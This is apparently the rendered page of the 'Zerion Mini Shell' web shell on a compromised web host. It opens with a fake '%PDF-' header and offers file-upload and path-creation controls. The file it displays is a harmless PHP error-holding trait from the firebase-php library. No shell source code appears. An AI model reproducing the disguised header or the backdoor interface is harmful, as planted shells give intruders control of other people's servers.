%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/graphicd/public_html/vebto/vendor/kreait/firebase-php/src/Firebase/Exception/
Upload File :
Create Path :
Current File : /home/graphicd/public_html/vebto/vendor/kreait/firebase-php/src/Firebase/Exception/HasErrors.php

<?php

declare(strict_types=1);

namespace Kreait\Firebase\Exception;

/**
 * @codeCoverageIgnore
 */
trait HasErrors
{
    /** @var array<mixed> */
    protected $errors = [];

    /**
     * @return array<mixed>
     */
    public function errors(): array
    {
        return $this->errors;
    }
}

Zerion Mini Shell 1.0